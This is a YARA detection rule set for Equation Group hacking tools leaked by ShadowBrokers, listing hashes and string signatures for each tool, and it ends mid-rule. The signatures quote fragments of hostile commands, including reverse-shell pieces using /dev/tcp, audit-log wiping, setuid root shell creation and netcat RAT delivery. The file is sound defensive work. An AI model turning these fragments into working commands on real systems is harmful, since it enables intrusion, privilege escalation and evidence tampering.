/* Yara Rule Set Author: Florian Roth Date: 2017-04-08 Identifier: Equation Group hack tools leaked by ShadowBrokers Notice: Avoiding false positives is difficult with almost no antivirus coverage during the rule testing phase. Please report back false positives via https://github.com/Neo23x0/signature-base/issues */ /* Rule Set ----------------------------------------------------------------- */ rule EquationGroup_emptycriss { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file emptycriss" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a698d35a0c4d25fd960bd40c1de1022bb0763b77938bf279e91c9330060b0b91" strings: $s1 = "./emptycriss " fullword ascii $s2 = "Cut and paste the following to the telnet prompt:" fullword ascii $s8 = "environ define TTYPROMPT abcdef" fullword ascii condition: ( filesize < 50KB and 1 of them ) } rule EquationGroup_scripme { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file scripme" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a1adf1c1caad96e7b7fd92cbf419c4cfa13214e66497c9e46ec274a487cd098a" strings: $x1 = "running \\\"tcpdump -n -n\\\", on the environment variable \\$INTERFACE, scripted" fullword ascii $x2 = "Cannot read $opetc/scripme.override -- are you root?" ascii $x3 = "$ENV{EXPLOIT_SCRIPME}" ascii $x4 = "$opetc/scripme.override" ascii condition: ( filesize < 30KB and 1 of them ) } rule EquationGroup_cryptTool { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file cryptTool" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "96947ad30a2ab15ca5ef53ba8969b9d9a89c48a403e8b22dd5698145ac6695d2" strings: $s1 = "The encryption key is " fullword ascii $s2 = "___tempFile2.out" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 200KB and all of them ) } rule EquationGroup_dumppoppy { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file dumppoppy" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "4a5c01590063c78d03c092570b3206fde211daaa885caac2ab0d42051d4fc719" strings: $x1 = "Unless the -c (clobber) option is used, if two RETR commands of the" fullword ascii $x2 = "mywarn(\"End of $destfile determined by \\\"^Connection closed by foreign host\\\"\")" fullword ascii $l1 = "End of $destfile determined by \"^Connection closed by foreign host" condition: ( filesize < 20KB and 1 of them ) } rule EquationGroup_Auditcleaner { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "8c172a60fa9e50f0df493bf5baeb7cc311baef327431526c47114335e0097626" strings: $x1 = "> /var/log/audit/audit.log; rm -f ." ascii $x2 = "Pastables to run on target:" ascii $x3 = "cp /var/log/audit/audit.log .tmp" ascii $l1 = "Here is the first good cron session from" fullword ascii $l2 = "No need to clean LOGIN lines." fullword ascii condition: ( filesize < 300KB and 1 of them ) } rule EquationGroup_reverse_shell { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file reverse.shell.script" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d29aa24e6fb9e3b3d007847e1630635d6c70186a36c4ab95268d28aa12896826" strings: $s1 = "sh >/dev/tcp/" ascii $s2 = " <&1 2>&1" fullword ascii condition: ( filesize < 1KB and all of them ) } rule EquationGroup_tnmunger { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file tnmunger" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "1ab985d84871c54d36ba4d2abd9168c2a468f1ba06994459db06be13ee3ae0d2" strings: $s1 = "TEST: mungedport=%6d pp=%d unmunged=%6d" fullword ascii $s2 = "mungedport=%6d pp=%d unmunged=%6d" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 10KB and 1 of them ) } rule EquationGroup_ys_ratload { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ys.ratload.sh" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a340e5b5cfd41076bd4d6ad89d7157eeac264db97a9dddaae15d935937f10d75" strings: $x1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"" fullword ascii $x2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii $x3 = "CALLBACK_PORT=32177" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 3KB and 1 of them ) } rule EquationGroup_eh_1_1_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file eh.1.1.0.0" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "0f8dd094516f1be96da5f9addc0f97bcac8f2a348374bd9631aa912344559628" strings: $x1 = "usage: %s -e -v -i target IP [-c Cert File] [-k Key File]" fullword ascii $x2 = "TYPE=licxfer&ftp=%s&source=/var/home/ftp/pub&version=NA&licfile=" ascii $x3 = "[-l Log File] [-m save MAC time file(s)] [-p Server Port]" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 100KB and 1 of them ) } rule EquationGroup_evolvingstrategy_1_0_1 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file evolvingstrategy.1.0.1.1" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "fe70e16715992cc86bbef3e71240f55c7d73815b4247d7e866c845b970233c1b" strings: $s1 = "chown root sh; chmod 4777 sh;" fullword ascii $s2 = "cp /bin/sh .;chown root sh;" fullword ascii $l1 = "echo clean up when elevated:" fullword ascii $x1 = "EXE=$DIR/sbin/ey_vrupdate" fullword ascii condition: ( filesize < 4KB and 1 of them ) } rule EquationGroup_toast_v3_2_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file toast_v3.2.0.1-linux" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "2ce2d16d24069dc29cf1464819a9dc6deed38d1e5ffc86d175b06ddb691b648b" strings: $x2 = "Del --- Usage: %s -l file -w wtmp -r user" fullword ascii $s5 = "Roasting ->%s<- at ->%d:%d<-" fullword ascii $s6 = "rbnoil -Roasting ->" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and 1 of them ) } rule EquationGroup_sshobo { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file sshobo" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "c7491898a0a77981c44847eb00fb0b186aa79a219a35ebbca944d627eefa7d45" strings: $x1 = "Requested forwarding of port %d but user is not root." fullword ascii $x2 = "internal error: we do not read, but chan_read_failed for istate" fullword ascii $x3 = "~# - list forwarded connections" fullword ascii $x4 = "packet_inject_ignore: block" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 600KB and all of them ) } rule EquationGroup_magicjack_v1_1_0_0_client_1_1_0_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file magicjack_v1.1.0.0_client-1.1.0.0.py" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "63292a2353275a3bae012717bb500d5169cd024064a1ce8355ecb4e9bfcdfdd1" strings: $x1 = "result = self.send_command(\"ls -al %s\" % self.options.DIR)" fullword ascii $x2 = "cmd += \"D=-l%s \" % self.options.LISTEN_PORT" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 80KB and 1 of them ) } rule EquationGroup_packrat { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file packrat" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d3e067879c51947d715fc2cf0d8d91c897fe9f50cae6784739b5c17e8a8559cf" strings: $x2 = "Use this on target to get your RAT:" fullword ascii $x3 = "$ratremotename && " fullword ascii $x5 = "$command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;" fullword ascii condition: ( filesize < 70KB and 1 of them ) } rule EquationGroup_telex { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file telex" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "e9713b15fc164e0f64783e7a2eac189a40e0a60e2268bd7132cfdc624dfe54ef" strings: $x1 = "usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] " fullword ascii $x2 = "target is not vulnerable. exiting" fullword ascii $s3 = "Sending final buffer: evil_blocks and shellcode..." fullword ascii $s4 = "Timeout waiting for daemon to die. Exploit probably failed." fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and 1 of them ) } rule EquationGroup_calserver { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file calserver" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "048625e9a0ca46d7fe221e262c8dd05e7a5339990ffae2fb65a9b0d705ad6099" strings: $x1 = "usage: %s e " fullword ascii $x2 = "Writing your %s to target." fullword ascii $x3 = "(e)xploit, (r)ead, (m)ove and then write, (w)rite" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 1 of them ) } rule EquationGroup_porkclient { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file porkclient" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "5c14e3bcbf230a1d7e2909876b045e34b1486c8df3c85fb582d9c93ad7c57748" strings: $s1 = "-c COMMAND: shell command string" fullword ascii $s2 = "Cannot combine shell command mode with args to do socket reuse" fullword ascii $s3 = "-r: Reuse socket for Nopen connection (requires -t, -d, -f, -n, NO -c)" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 1 of them ) } rule EquationGroup_electricslide { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file electricslide" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d27814b725568fa73641e86fa51850a17e54905c045b8b31a9a5b6d2bdc6f014" strings: $x1 = "Firing with the same hosts, on altername ports (target is on 8080, listener on 443)" fullword ascii $x2 = "Recieved Unknown Command Payload: 0x%x" fullword ascii $x3 = "Usage: eslide [options] <-t profile> <-l listenerip> " fullword ascii $x4 = "-------- Delete Key - Remove a *closed* tab" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 2000KB and 1 of them ) } rule EquationGroup_libXmexploit2 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file libXmexploit2.8" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "d7ed0234d074266cb37dd6a6a60119adb7d75cc6cc3b38654c8951b643944796" strings: $s1 = "Usage: ./exp command display_to_return_to" fullword ascii $s2 = "sizeof shellcode = %d" fullword ascii $s3 = "Execve failed!" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and 1 of them ) } rule EquationGroup_wrap_telnet { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file wrap-telnet.sh" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "4962b307a42ba18e987d82aa61eba15491898978d0e2f0e4beb02371bf0fd5b4" strings: $s1 = "echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"" fullword ascii $s2 = "-x [ port to start mini X server on DEFAULT = 12121 ]\"" fullword ascii $s3 = "echo \"Call back port2 = ${SPORT}\"" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 4KB and 1 of them ) } rule EquationGroup_elgingamble { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file elgingamble" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "0573e12632e6c1925358f4bfecf8c263dd13edf52c633c9109fe3aae059b49dd" strings: $x1 = "* * * * * root chown root %s; chmod 4755 %s; %s" fullword ascii $x2 = "[-] kernel not vulnerable" fullword ascii $x3 = "[-] failed to spawn shell: %s" fullword ascii $x4 = "-s shell Use shell instead of %s" fullword ascii condition: 1 of them } rule EquationGroup_cmsd { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file cmsd" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "634c50614e1f5f132f49ae204c4a28f62a32a39a3446084db5b0b49b564034b8" strings: $x1 = "usage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]" fullword ascii $x2 = "error: not vulnerable" fullword ascii $s1 = "port=%d connected! " fullword ascii $s2 = "xxx.XXXXXX" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 1 of ($x*) ) or ( 2 of them ) } rule EquationGroup_ebbshave { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "eb5e0053299e087c87c2d5c6f90531cc1946019c85a43a2998c7b66a6f19ca4b" strings: $s1 = "executing ./ebbnew_linux -r %s -v %s -A %s %s -t %s -p %s" fullword ascii $s2 = "./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772" fullword ascii $s3 = "version 1 - Start with option #18 first, if it fails then try this option" fullword ascii $s4 = "%s is a wrapper program for ebbnew_linux exploit for Sparc Solaris RPC services" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 20KB and 1 of them ) or ( 2 of them ) } rule EquationGroup_eggbasket { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file eggbasket" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "b078a02963610475217682e6e1d6ae0b30935273ed98743e47cc2553fbfd068f" strings: $x1 = "# Building Shellcode into exploit." fullword ascii $x2 = "%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80" fullword ascii $x3 = "# STARTING EXHAUSTIVE ATTACK AGAINST " fullword ascii condition: ( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them ) } rule EquationGroup_jparsescan { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file jparsescan" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "8c248eec0af04300f3ba0188fe757850d283de84cf42109638c1c1280c822984" strings: $s1 = "Usage: $prog [-f directory] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii $s2 = "$gotsunos = ($line =~ /program version netid address service owner/ );" fullword ascii condition: ( filesize < 40KB and 1 of them ) } rule EquationGroup_sambal { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file sambal" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "2abf4bbe4debd619b99cb944298f43312db0947217437e6b71b9ea6e9a1a4fec" strings: $s1 = "+ Bruteforce mode." fullword ascii $s3 = "+ Host is not running samba!" fullword ascii $s4 = "+ connecting back to: [%d.%d.%d.%d:45295]" fullword ascii $s5 = "+ Exploit failed, try -b to bruteforce." fullword ascii $s7 = "Usage: %s [-bBcCdfprsStv] [host]" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 90KB and 1 of them ) or ( 2 of them ) } rule EquationGroup_pclean_v2_1_1_2 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file pclean.v2.1.1.0-linux-i386" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "cdb5b1173e6eb32b5ea494c38764b9975ddfe83aa09ba0634c4bafa41d844c97" strings: $s3 = "** SIGNIFICANTLY IMPROVE PROCESSING TIME" fullword ascii $s6 = "-c cmd_name: strncmp() search for 1st %d chars of commands that " fullword ascii condition: ( uint16(0) == 0x457f and filesize < 40KB and all of them ) } rule EquationGroup_envisioncollision { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file envisioncollision" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "75d5ec573afaf8064f5d516ae61fd105012cbeaaaa09c8c193c7b4f9c0646ea1" strings: $x1 = "mysql \\$D --host=\\$H --user=\\$U --password=\\\"\\$P\\\" -e \\\"select * from \\$T" fullword ascii $x2 = "Window 3: $0 -Uadmin -Ppassword -i127.0.0.1 -Dipboard -c\\\"sleep 500|nc" fullword ascii $s3 = "$ua->agent(\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\");" fullword ascii $s4 = "$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications§ion=hooks&do=install_hook\";" fullword ascii condition: ( uint16(0) == 0x2123 and filesize < 20KB and 1 of ($x*) ) or ( 2 of them ) } rule EquationGroup_cmsex { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file cmsex" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "2d8ae842e7b16172599f061b5b1f223386684a7482e87feeb47a38a3f011b810" strings: $x1 = "Usage: %s -i -c -T (-u | -t ) " fullword ascii $x2 = "-i target ip address / hostname " fullword ascii $x3 = "Note: Choosing the correct target type is a bit of guesswork." fullword ascii $x4 = "Solaris rpc.cmsd remote root exploit" fullword ascii $x5 = "If one choice fails, you may want to try another." fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and 1 of ($x*) ) or ( 2 of them ) } rule EquationGroup_exze { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file exze" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "1af6dde6d956db26c8072bf5ff26759f1a7fa792dd1c3498ba1af06426664876" strings: $s1 = "shellFile" fullword ascii $s2 = "completed.1" fullword ascii $s3 = "zeke_remove" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 80KB and all of them ) } rule EquationGroup_porkserver { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file porkserver" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "7b5f86e289047dd673e8a09438d49ec43832b561bac39b95098f5bf4095b8b4a" strings: $s1 = "%s/%s server failing (looping), service terminated" fullword ascii $s2 = "getpwnam: %s: No such user" fullword ascii $s3 = "execv %s: %m" fullword ascii $s4 = "%s/%s: unknown service" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 70KB and 3 of them ) } rule EquationGroup_DUL { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file DUL" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "24d1d50960d4ebf348b48b4db4a15e50f328ab2c0e24db805b106d527fc5fe8e" strings: $x1 = "?Usage: %s " fullword ascii $x2 = "Here is the decoder+(encoded-decoder)+payload" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 80KB and 1 of them ) or ( all of them ) } rule EquationGroup_slugger2 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file slugger2" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a6a9ab66d73e4b443a80a69ef55a64da7f0af08dfaa7e17eb19c327301a70bdf" strings: $x1 = "usage: %s hostip port cmd [printer_name]" fullword ascii $x2 = "command must be less than 61 chars" fullword ascii $s1 = "__rw_read_waiting" fullword ascii $s2 = "completed.1" fullword ascii $s3 = "__mutexkind" fullword ascii $s4 = "__rw_pshared" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 50KB and ( 4 of them and 1 of ($x*) ) ) or ( all of them ) } rule EquationGroup_ebbisland { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ebbisland" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "eba07c98c7e960bb6c71dafde85f5da9f74fd61bc87793c87e04b1ae2d77e977" strings: $x1 = "Usage: %s [-V] -t -p port" fullword ascii $x2 = "error - shellcode not as expected - unable to fix up" fullword ascii $x3 = "WARNING - core wipe mode - this will leave a core file on target" fullword ascii $x4 = "[-C] wipe target core file (leaves less incriminating core on failed target)" fullword ascii $x5 = "-A (shellcode address)" fullword ascii $x6 = "*** Insane undocumented incremental port mode!!! ***" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_jackpop { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file jackpop" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "0b208af860bb2c7ef6b1ae1fcef604c2c3d15fc558ad8ea241160bf4cbac1519" strings: $x1 = "%x:%d --> %x:%d %d bytes" fullword ascii $s1 = "client: can't bind to local address, are you root?" fullword ascii $s2 = "Unable to register port" fullword ascii $s3 = "Could not resolve destination" fullword ascii $s4 = "raw troubles" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and 3 of them ) or ( all of them ) } rule EquationGroup_parsescan { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file parsescan" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "942c12067b0afe9ebce50aa9dfdbf64e6ed0702d9a3a00d25b4fca62a38369ef" strings: $s1 = "$gotgs=1 if (($line =~ /Scan for (Sol|SNMP)\\s+version/) or" fullword ascii $s2 = "Usage: $prog [-f file] -p prognum [-V ver] [-t proto] -i IPadr" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_jscan { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file jscan" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "8075f56e44185e1be26b631a2bad89c5e4190c2bfc9fa56921ea3bbc51695dbe" strings: $s1 = "$scanth = $scanth . \" -s \" . $scanthreads;" fullword ascii $s2 = "print \"java -jar jscanner.jar$scanth$list\\n\";" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_promptkill { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file promptkill" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "b448204503849926be249a9bafbfc1e36ef16421c5d3cfac5dac91f35eeaa52d" strings: $x1 = "exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");" fullword ascii $x2 = "$xargs=\"-title \\\"Kill process $pid?\\\" -name \\\"Kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_epoxyresin_v1_0_0 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file epoxyresin.v1.0.0.1" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "eea8a6a674d5063d7d6fc9fe07060f35b16172de6d273748d70576b01bf01c73" strings: $x1 = "[-] kernel not vulnerable" fullword ascii $s1 = ".tmp.%d.XXXXXX" fullword ascii $s2 = "[-] couldn't create temp file" fullword ascii $s3 = "/boot/System.map-%s" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 30KB and $x1 ) or ( all of them ) } rule EquationGroup_estopmoonlit { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file estopmoonlit" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "707ecc234ed07c16119644742ebf563b319b515bf57fd43b669d3791a1c5e220" strings: $x1 = "[+] shellcode prepared, re-executing" fullword ascii $x2 = "[-] kernel not vulnerable: prctl" fullword ascii $x3 = "[-] shell failed" fullword ascii $x4 = "[!] selinux apparently enforcing. Continue [y|n]? " fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_envoytomato { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file envoytomato" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "9bd001057cc97b81fdf2450be7bf3b34f1941379e588a7173ab7fffca41d4ad5" strings: $s1 = "[-] kernel not vulnerable" fullword ascii $s2 = "[-] failed to spawn shell" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_smash { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file smash" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "1dc94b46aaff06d65a3bf724c8701e5f095c1c9c131b65b2f667e11b1f0129a6" strings: $x1 = "T= [O=] Y=" fullword ascii $x2 = "no command given!! bailing..." fullword ascii $x3 = "no port. assuming 22..." fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_ratload { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ratload" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "4a4a8f2f90529bee081ce2188131bac4e658a374a270007399f80af74c16f398" strings: $x1 = "/tmp/ratload.tmp.sh" fullword ascii $x2 = "Remote Usage: /bin/telnet locip locport < /dev/console | /bin/sh\"" fullword ascii $s6 = "uncompress -f ${NAME}.Z && PATH=. ${ARGS1} ${NAME} ${ARGS2} && rm -f ${NAME}" fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_ys { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ys.auto" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "a6387307d64778f8d9cfc60382fdcf0627cde886e952b8d73cc61755ed9fde15" strings: $x1 = "EXPLOIT_SCRIPME=\"$EXPLOIT_SCRIPME\"" fullword ascii $x3 = "DEFTARGET=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`" fullword ascii $x4 = "FATAL ERROR: -x port and -n port MUST NOT BE THE SAME." fullword ascii condition: filesize < 250KB and 1 of them } rule EquationGroup_ewok { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file ewok" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "567da502d7709b7814ede9c7954ccc13d67fc573f3011db04cf212f8e8a95d72" strings: $x1 = "Example: ewok -t target public" fullword ascii $x2 = "Usage: cleaner host community fake_prog" fullword ascii $x3 = "-g - Subset of -m that Green Spirit hits " fullword ascii $x4 = "--- ewok version" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 80KB and 1 of them ) } rule EquationGroup_xspy { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file xspy" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "841e065c9c340a1e522b281a39753af8b6a3db5d9e7d8f3d69e02fdbd662f4cf" strings: $s1 = "USAGE: xspy -display -delay -up" fullword ascii condition: ( uint16(0) == 0x457f and filesize < 60KB and all of them ) } rule EquationGroup_estesfox { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file estesfox" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "33530cae130ee9d9deeee60df9292c00242c0fe6f7b8eedef8ed09881b7e1d5a" strings: $x1 = "chown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cron" fullword ascii condition: all of them } rule EquationGroup_elatedmonkey_1_0_1_1 { meta: description = "Equation Group hack tool leaked by ShadowBrokers- file elatedmonkey.1.0.1.1.sh" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-08" hash1 = "bf7a9dce326604f0681ca9f7f1c24524543b5be8b6fcc1ba427b18e2a4ff9090" strings: $x3 = "Usage: $0 ( -s IP PORT | CMD )" fullword ascii $s5 = "os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$CMD\")" fullword ascii $s13 = "PHP_SCRIPT=\"$HOME/public_html/info$X.php\"" fullword ascii $s15 = "cat > /dev/tcp/127.0.0.1/80 < /dev/null' % (storebin, b))" fullword ascii $x3 = "print ' -k keyfile the key text file to inject'" fullword ascii condition: ( filesize < 20KB and 1 of them ) } rule EquationGroup_noclient_3_3_2 { meta: description = "Equation Group hack tool set" author = "Florian Roth" reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1" date = "2017-04-09" hash1 = "3cf0eb010c431372af5f32e2ee8c757831215f8836cabc7d805572bb5574fc72" strings: $x1 = "127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning" fullword ascii $x2 = "iptables -%c OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;" fullword ascii $x3 = "noclient: failed to execute %s: %s" fullword ascii $x4 = "sh -c \"ping -c 2 %s; grep %s /proc/net/arp >/tmp/gx \"" fullword ascii $s5 = "Attempting connection from 